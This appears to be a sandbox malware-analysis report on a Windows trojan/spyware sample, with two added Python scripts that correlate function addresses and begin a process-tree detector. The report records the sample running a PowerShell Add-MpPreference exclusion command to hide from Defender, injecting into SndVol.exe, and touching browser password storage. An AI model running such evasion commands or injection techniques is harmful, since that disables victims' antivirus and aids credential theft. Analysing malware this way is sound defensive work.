                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0042F263
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_004033C0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_004023FB
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0041047C
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_00402400
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_00410483
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_004025E4
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_004025F0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_00402E40
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_00416E03
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_00402E32
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0040E683
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_004106A3
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0040E7D3
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011E0100
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0128A118
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01278158
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012B01AA
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012A81CC
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01282000
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012AA352
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012B03E6
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011FE3F0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012702C0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011F0535
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012B0591
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012A2446
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0129E4F6
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011F0770
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01214750
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011EC7C0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0120C6E0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01206962
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012BA9A6
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011F29A0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011F2840
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011FA840
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011D68B8
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0121E8F0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012AAB40
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012A6BD7
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011EEA80
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011FAD00
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01208DBF
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011EADE0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011F0C00
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01290CB5
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011E0CF2
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01232F28
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01210F30
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01264F40
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0126EFA0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011E2FC8
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011FCFE0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012AEE26
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011F0E59
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01202E90
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012ACE93
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012AEEDB
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012BB16B
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0122516C
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011DF172
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011FB1B0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012A70E9
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012AF0E0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011F70C0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0129F0CC
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012A132D
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011DD34C
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0123739A
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011F52A0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012912ED
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0120B2C0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012A7571
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0128D5B0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012AF43F
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011E1460
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012AF7B0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012A16CC
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01285910
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011F9950
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0120B950
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0125D800
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011F38E0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012AFB76
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0120FB80
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01265BF0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0122DBF9
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01263A6C
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012AFA49
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012A7A46
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01235AA0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0128DAAC
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0129DAC6
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012A7D73
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011F3D40
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012A1D5A
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0120FDC0
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_01269C32
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012AFCF2
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012AFF09
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011F1F92
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_012AFFB1
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011F9EB0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05240535
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05300591
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_052F2446
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_052EE4F6
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05240770
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05264750
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_0523C7C0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_0525C6E0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05230100
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_052DA118
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_052C8158
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_053001AA
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_052F81CC
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_052D2000
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_052FA352
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_0524E3F0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_053003E6
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_052E0274
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_052C02C0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_0524AD00
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_052DCD1F
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05258DBF
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_0523ADE0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05240C00
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_052E0CB5
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05230CF2
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05282F28
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05260F30
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_052B4F40
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_052BEFA0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_0524CFE0
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05232FC8
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_052FEE26
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05240E59
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05252E90
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_052FCE93
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_052FEEDB
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_05256962
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052429A016_2_052429A0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0530A9A616_2_0530A9A6
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0524A84016_2_0524A840
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0524284016_2_05242840
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052268B816_2_052268B8
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0526E8F016_2_0526E8F0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FAB4016_2_052FAB40
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052F6BD716_2_052F6BD7
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0523EA8016_2_0523EA80
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052F757116_2_052F7571
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052DD5B016_2_052DD5B0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FF43F16_2_052FF43F
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0523146016_2_05231460
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FF7B016_2_052FF7B0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052F16CC16_2_052F16CC
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0527516C16_2_0527516C
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0522F17216_2_0522F172
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0530B16B16_2_0530B16B
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0524B1B016_2_0524B1B0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052F70E916_2_052F70E9
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FF0E016_2_052FF0E0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052EF0CC16_2_052EF0CC
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052470C016_2_052470C0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052F132D16_2_052F132D
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0522D34C16_2_0522D34C
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0528739A16_2_0528739A
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052452A016_2_052452A0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052E12ED16_2_052E12ED
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0525B2C016_2_0525B2C0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052F7D7316_2_052F7D73
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05243D4016_2_05243D40
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052F1D5A16_2_052F1D5A
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0525FDC016_2_0525FDC0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052B9C3216_2_052B9C32
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FFCF216_2_052FFCF2
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FFF0916_2_052FFF09
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FFFB116_2_052FFFB1
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05241F9216_2_05241F92
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05249EB016_2_05249EB0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052D591016_2_052D5910
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0524995016_2_05249950
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0525B95016_2_0525B950
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052AD80016_2_052AD800
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052438E016_2_052438E0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FFB7616_2_052FFB76
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0525FB8016_2_0525FB80
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052B5BF016_2_052B5BF0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0527DBF916_2_0527DBF9
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052B3A6C16_2_052B3A6C
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FFA4916_2_052FFA49
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052F7A4616_2_052F7A46
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052DDAAC16_2_052DDAAC
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05285AA016_2_05285AA0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052EDAC616_2_052EDAC6
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032B1F1016_2_032B1F10
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032AB19016_2_032AB190
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032AD06016_2_032AD060
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032AB04016_2_032AB040
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032B37C016_2_032B37C0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032B55D016_2_032B55D0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032ACE3916_2_032ACE39
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032ACE4016_2_032ACE40
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032CBC2016_2_032CBC20
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0555E47316_2_0555E473
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0555E35516_2_0555E355
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0555E80F16_2_0555E80F
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0555D8D816_2_0555D8D8
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0555CB7816_2_0555CB78
Source: C:\Users\user\Desktop\ungziped_file.exe | String function: 01225130 appears 56 times
Source: C:\Users\user\Desktop\ungziped_file.exe | String function: 0125EA12 appears 86 times
Source: C:\Users\user\Desktop\ungziped_file.exe | String function: 011DB970 appears 275 times
Source: C:\Users\user\Desktop\ungziped_file.exe | String function: 01237E54 appears 100 times
Source: C:\Users\user\Desktop\ungziped_file.exe | String function: 0126F290 appears 105 times
Source: C:\Windows\SysWOW64\SndVol.exe | String function: 052AEA12 appears 86 times
Source: C:\Windows\SysWOW64\SndVol.exe | String function: 05275130 appears 57 times
Source: C:\Windows\SysWOW64\SndVol.exe | String function: 052BF290 appears 89 times
Source: C:\Windows\SysWOW64\SndVol.exe | String function: 0522B970 appears 275 times
Source: C:\Windows\SysWOW64\SndVol.exe | String function: 05287E54 appears 100 times
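The string-function rows above line up across the two processes: every address reported for SndVol.exe (process 16) sits exactly 0x04050000 above its counterpart in the second ungziped_file.exe instance (process 5), 0x01225130 against 0x05275130, 0x011DB970 against 0x0522B970, and so on, with the same appearance counts (275, 100, 86). The four process-5 code functions at the top of this section (0x012AFF09, 0x011F1F92, 0x012AFFB1, 0x011F9EB0) have counterparts in the SndVol.exe list under the same offset (0x052FFF09, 0x05241F92, 0x052FFFB1, 0x05249EB0). That is what one image looks like when it is mapped at two different bases, and it is consistent with the unpacked payload having been written into SndVol.exe rather than SndVol.exe executing its own code. The script below is an added example, not part of the Joe Sandbox report: it takes the addresses copied from this page (all nine for process 5, a subset for process 16, including addresses in the 0x032A... and 0x0555... ranges that should not match) and recovers the dominant delta. Treating one dominant delta with several matches as evidence of a rebased image is an assumption of the example, not a Joe Sandbox result.

```python
"""Correlate function addresses between two processes to detect one image
mapped at two bases.

Added example, not part of the Joe Sandbox report. The address lists are
copied from the report's code-function and string-function rows; the
"dominant delta" heuristic is this example's assumption.
"""
from collections import Counter

# Process 5 (second ungziped_file.exe instance): 4 code functions + 5 string functions.
PROC5 = [
    0x012AFF09, 0x011F1F92, 0x012AFFB1, 0x011F9EB0,
    0x01225130, 0x0125EA12, 0x011DB970, 0x01237E54, 0x0126F290,
]

# Process 16 (SndVol.exe): the matching rows plus a few from other regions
# (0x0524..., 0x032A..., 0x0555...) that are not part of the rebased image.
PROC16 = [
    0x052FFF09, 0x05241F92, 0x052FFFB1, 0x05249EB0,
    0x05275130, 0x052AEA12, 0x0522B970, 0x05287E54, 0x052BF290,
    0x05240535, 0x05300591, 0x052F2446,
    0x032B1F10, 0x032AB190, 0x032CBC20,
    0x0555E473, 0x0555E355, 0x0555CB78,
]


def dominant_delta(src, dst):
    """Return (delta, matches): delta is the most common (dst - src) difference
    over all address pairs, matches the sorted src addresses that have a
    counterpart at src + delta in dst."""
    counts = Counter(b - a for a in src for b in dst)
    delta, _ = counts.most_common(1)[0]
    dst_set = set(dst)
    matches = sorted(a for a in src if a + delta in dst_set)
    return delta, matches


def same_image_rebased(src, dst, min_matches=3):
    """True when at least min_matches functions of src reappear in dst under
    a single delta; two unrelated modules rarely share more than one."""
    _, matches = dominant_delta(src, dst)
    return len(matches) >= min_matches


if __name__ == "__main__":
    delta, matched = dominant_delta(PROC5, PROC16)
    print(f"dominant delta 0x{delta:08X}: {len(matched)}/{len(PROC5)} functions line up")
    for a in matched:
        print(f"  5_2_{a:08X} -> 16_2_{a + delta:08X}")
```

The same check works on any two function lists exported from a disassembler or from another sandbox run; if the dominant delta is backed by only one or two matches, the lists are more likely two different modules than one rebased image.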
Source: ungziped_file.exe, 00000000.00000002.1065145964.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs ungziped_file.exe
Source: ungziped_file.exe, 00000000.00000002.1090175804.0000000007280000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs ungziped_file.exe
Source: ungziped_file.exe, 00000000.00000002.1078729366.0000000002BE6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs ungziped_file.exe
Source: ungziped_file.exe, 00000000.00000000.1046304446.000000000073C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameKznq.exe4 vs ungziped_file.exe
Source: ungziped_file.exe, 00000000.00000002.1088420350.00000000053A0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs ungziped_file.exe
Source: ungziped_file.exe, 00000005.00000002.1397449431.00000000012DD000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs ungziped_file.exe
Source: ungziped_file.exe | Binary or memory string: OriginalFilenameKznq.exe4 vs ungziped_file.exe
Source: ungziped_file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ungziped_file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, YguAtk6ZmoepowUBfe.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, YguAtk6ZmoepowUBfe.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, CXux7G8Bf9KDYHKbCO.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, CXux7G8Bf9KDYHKbCO.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, CXux7G8Bf9KDYHKbCO.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@14/12@13/12
Source: C:\Users\user\Desktop\ungziped_file.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ungziped_file.exe.log
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j0u1oem5.uob.ps1
Source: ungziped_file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ungziped_file.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\ungziped_file.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\ungziped_file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SndVol.exe, 00000010.00000002.3510287029.00000000035D8000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000010.00000003.1577523929.0000000003589000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3510287029.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000010.00000003.1580511150.00000000035B5000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000010.00000003.1577665818.00000000035AA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: ungziped_file.exe | Virustotal: Detection: 38%
Source: ungziped_file.exe | ReversingLabs: Detection: 50%
Source: unknown | Process created: C:\Users\user\Desktop\ungziped_file.exe "C:\Users\user\Desktop\ungziped_file.exe"
Source: C:\Users\user\Desktop\ungziped_file.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ungziped_file.exe | Process created: C:\Users\user\Desktop\ungziped_file.exe "C:\Users\user\Desktop\ungziped_file.exe"
Source: C:\Users\user\Desktop\ungziped_file.exe | Process created: C:\Users\user\Desktop\ungziped_file.exe "C:\Users\user\Desktop\ungziped_file.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe | Process created: C:\Windows\SysWOW64\SndVol.exe "C:\Windows\SysWOW64\SndVol.exe"
Source: C:\Windows\SysWOW64\SndVol.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\ungziped_file.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe"
Source: C:\Users\user\Desktop\ungziped_file.exe | Process created: C:\Users\user\Desktop\ungziped_file.exe "C:\Users\user\Desktop\ungziped_file.exe"
Source: C:\Users\user\Desktop\ungziped_file.exe | Process created: C:\Users\user\Desktop\ungziped_file.exe "C:\Users\user\Desktop\ungziped_file.exe"
Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe | Process created: C:\Windows\SysWOW64\SndVol.exe "C:\Windows\SysWOW64\SndVol.exe"
Source: C:\Windows\SysWOW64\SndVol.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
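The process rows above give the whole infection chain in a handful of edges: the dropper on the Desktop starts powershell.exe to add a Defender exclusion for its own path (Add-MpPreference only succeeds in an elevated session), starts a second copy of itself (that second instance is process 5 in the code-function rows above), a dropped binary in a random-named Program Files (x86) directory launches the Windows volume applet SndVol.exe with no arguments, and SndVol.exe, which has no business starting other programs, launches Firefox. The detection logic below is an added example, not a Joe Sandbox signature and not part of the report: the event records are constructed by hand from the process tree above (images and command lines are the page's; the field names and the pids other than 0, 5 and 16 are assumptions), and each rule is written so it can be run unchanged over a host's own process-creation telemetry.

```python
"""Flag the process-tree patterns shown in this report from process-creation
events.

Added example, not part of the Joe Sandbox report and not one of its
signatures. Images and command lines come from the report's process rows;
the record layout and the pids other than 0, 5 and 16 are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    image: str          # full path of the created process
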